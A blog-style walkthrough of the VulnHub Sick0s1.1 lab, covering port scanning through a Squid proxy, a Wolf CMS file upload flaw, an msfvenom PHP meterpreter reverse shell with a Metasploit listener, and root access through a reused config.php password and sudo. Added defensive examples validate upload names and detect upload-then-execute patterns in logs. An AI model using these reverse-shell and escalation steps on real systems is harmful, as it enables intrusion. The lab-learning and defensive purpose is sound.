VulnHub Lab Series 13 - Sick0s1.1

Target machine: Sick0s1.1 ~ VulnHub
Difficulty: 1.5 / 10.0

This article briefly records each step of the penetration of the target machine; not every step of the process is described in great detail, and parts of it may contain mistakes. Readers are welcome to point them out, thank you!

Summary: scanning finds ports 80 and 3128; set port 3128 as a proxy to reach port 80. Information gathering shows the site runs the Wolf CMS framework, and a Google search for it turns up a file upload / code execution vulnerability. Generate a reverse-connection script with msfvenom and upload it, then catch the connection locally with the msf handler module. After obtaining a low-privilege shell, use /etc/passwd and config.php to log in as the sickos user and escalate directly to root.

Still to be worked out: connecting with the weevely tool, compiling files with g++.

Host Discovery & Port Scanning

Target IP: 192.168.1.12

Port scan results:

hhh@Kali2020:~$ sudo nmap -sS -p- 192.168.1.12
[sudo] hhh 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-06 11:07 CST
Nmap scan report for sickos (192.168.1.12)
Host is up (0.00029s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:EA:11:1C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.47 seconds

Information Gathering

Accessing port 80 directly does not work here; a proxy is needed. In Firefox, set the proxy to 192.168.1.12:3128.

Scan the website:

hhh@Kali2020:~$ nikto -h 192.168.1.12 -useproxy http://192.168.1.12:3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.12
+ Target Hostname:    192.168.1.12
+ Target Port:        80
+ Proxy:              192.168.1.12:3128
+ Start Time:         2021-02-06 13:34:43 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec  5 08:35:02 2015
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ 8726 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2021-02-06 13:40:21 (GMT8) (338 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

robots.txt hints that the site framework is Wolf CMS.

Searching Google for it turns up a file upload / code execution vulnerability:
Wolf CMS - Arbitrary File Upload / Execution

Following the vulnerability demonstration to gain access:

A) Log in as a regular user (one who has access to the upload functionality)

B) Go to this page:
http://targetsite.com/wolfcms/?/admin/plugin/file_manager/browse/

C) Select the upload-a-file option to upload an arbitrary file (filename e.g.
"hello.php")

D) The file can now be accessed here:
http://targetsite.com/wolfcms/public/hello.php

Related vulnerability information:

Analysis of the file upload vulnerability in the old and new Wolf CMS versions
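As an added example that is not part of this write-up or of Wolf CMS itself, the check below shows the server-side allow-list validation that would turn step C above into a rejected request: the file manager stored whatever name the client sent ("hello.php") under a web-served public/ directory, so the upload became executable code. The extension sets, the stem pattern and the random on-disk name are illustrative assumptions, not Wolf CMS behaviour.

```python
# Added example (not from the original write-up or from Wolf CMS itself):
# a server-side allow-list check for upload names. The extension sets and
# the 32-hex-character storage name are illustrative choices.
import os
import re
import secrets

# Only these extensions may be stored under a web-served directory.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Anything the web server might execute or interpret, wherever it appears in
# the name: "shell.php.jpg" can still run under some Apache AddHandler setups.
DANGEROUS_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar",
                        "cgi", "pl", "sh", "htaccess"}

# Conservative stem: letters, digits, underscore, hyphen; no spaces or dots.
SAFE_STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def _client_basename(filename: str) -> str:
    """Discard any directory component the client sent ("../public/x.php")."""
    return os.path.basename(filename.replace("\\", "/"))


def is_safe_upload_name(filename: str) -> bool:
    """Return True only for names that cannot become executable content."""
    base = _client_basename(filename)
    # Reject hidden files such as ".htaccess" and names without an extension.
    if not base or base.startswith(".") or "." not in base:
        return False
    stem, *exts = base.lower().split(".")
    if not SAFE_STEM_RE.match(stem):
        return False
    # Refuse executable extensions anywhere in the name, then require exactly
    # one extension from the allow-list (this also rejects double extensions).
    if any(ext in DANGEROUS_EXTENSIONS for ext in exts):
        return False
    return len(exts) == 1 and exts[0] in ALLOWED_EXTENSIONS


def storage_name(filename: str):
    """Random on-disk name carrying the validated extension, or None if rejected.

    The client-chosen name never reaches the filesystem, so an attacker cannot
    predict it and request /wolfcms/public/<name> afterwards."""
    if not is_safe_upload_name(filename):
        return None
    ext = _client_basename(filename).lower().rsplit(".", 1)[1]
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name in ("photo.jpg", "hello.php", "hello.php.jpg", ".htaccess"):
        print(f"{name!r:18} -> {storage_name(name)}")
```

The second half of the fix is outside this code: the directory that receives uploads should not be served with PHP execution enabled at all (for example, `php_admin_flag engine off` in the Apache configuration for that directory), so that even a bypass of the name check yields a file that is downloaded rather than run.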

Gaining Access

I had studied the weevely tool earlier and tried it briefly here, but it did not work, probably because I have not grasped some details. I also tried connecting with Caidao (China Chopper) and AntSword, but neither worked either; I will look at it again some other time.

  1. Generate the reverse_tcp reverse-connection script, setting the local Kali IP and port:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.15 lport=4444 -f raw

  2. Write the output to the file shell.php

  3. Upload that file on the upload page:
192.168.1.12/wolfcms/?/admin/plugin/file_manager/browse/

  4. Start a listener locally:
msfconsole	# start MSF
use exploit/multi/handler	# select the handler module
set payload php/meterpreter/reverse_tcp	# set the payload
show options	# show the module's settings
set lhost 192.168.1.15
set lport 4444
exploit

  5. Open the script on the website:
http://192.168.1.12/wolfcms/public/shell.php

  6. msf receives the reverse connection; type shell to get a command shell.
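An added example, not from the original write-up: detection logic a defender can run over Apache access logs to catch the upload-then-request sequence described above, a request to the admin file manager followed by a 200 response for a PHP file served from the CMS's public upload directory. The log lines are constructed for the example; the URL prefixes are the ones quoted in this write-up.

```python
# Added example (not from the original write-up): flag PHP files being served
# from Wolf CMS's public upload directory, and raise the severity when the
# same client touched the admin file manager earlier in the log. The log
# lines are constructed; the URL prefixes are the ones quoted in the write-up.
import re

# Apache common/combined format: client ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Wolf CMS routes admin pages through "?/...", so the file manager and the
# upload directory are plain prefixes of the request target.
FILE_MANAGER_PREFIX = "/wolfcms/?/admin/plugin/file_manager/"
PUBLIC_DIR_PREFIX = "/wolfcms/public/"

# Server-side script extensions that should never be requested under public/.
EXEC_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(\?|$)", re.IGNORECASE)

# Constructed sample: login, upload via the file manager, then the uploaded
# script is requested; an unrelated client fetches a static image.
SAMPLE_LOG = """\
192.168.1.15 - - [06/Feb/2021:14:01:02 +0800] "GET /wolfcms/?/admin/login HTTP/1.1" 200 1532
192.168.1.15 - - [06/Feb/2021:14:01:40 +0800] "POST /wolfcms/?/admin/plugin/file_manager/upload HTTP/1.1" 302 0
192.168.1.15 - - [06/Feb/2021:14:02:05 +0800] "GET /wolfcms/public/shell.php HTTP/1.1" 200 0
192.168.1.20 - - [06/Feb/2021:14:03:11 +0800] "GET /wolfcms/public/images/logo.png HTTP/1.1" 200 4211
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_upload_execution(log_text):
    """Scan log text in order and return one alert per executable file served
    with status 200 from the upload directory. Severity is 'high' when that
    client had already used the admin file manager, 'medium' otherwise."""
    alerts = []
    used_file_manager = set()  # client IPs seen at the file-manager endpoint
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if path.startswith(FILE_MANAGER_PREFIX):
            used_file_manager.add(ip)
            continue
        if (path.startswith(PUBLIC_DIR_PREFIX)
                and EXEC_EXT_RE.search(path)
                and rec["status"] == "200"):
            alerts.append({
                "ts": rec["ts"],
                "ip": ip,
                "path": path,
                "severity": "high" if ip in used_file_manager else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_upload_execution(SAMPLE_LOG):
        print(alert)
```

One caveat for this particular setup: the nikto output above shows the site is reached through Squid (the Via header names squid/3.1.19), so Apache records the proxy, not the real client, as the source address. The per-client correlation then needs Apache to log the X-Forwarded-For value Squid adds, or the same rule run over Squid's own access.log.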

Privilege Escalation

At first I wanted to escalate with dirtycow, but the target has no g++, and a binary compiled on Kali does not match the target's execution environment: it fails with cannot execute binary file. I will analyze this further some other time.

Searching the directory turns up the file config.php, which contains the MySQL password.

Looking at /etc/passwd, the sickos user is the first user.

Try logging in as that user with the password just found:

su sickos  # switch user

It turns out sickos has quite high privileges:

sudo -l  # list the current user's sudo rights

Escalate directly:

sudo -s  # run the specified shell (the one shown in passwd)

sudo su: switches to root, and the environment changes as well.
sudo -s: switches to superuser privileges but keeps the original user's environment.

Summary

  1. Proxy on port 3128
  2. Wolf CMS
  3. reverse_tcp
  4. /etc/passwd

posted @ 2021-02-07 22:28 labster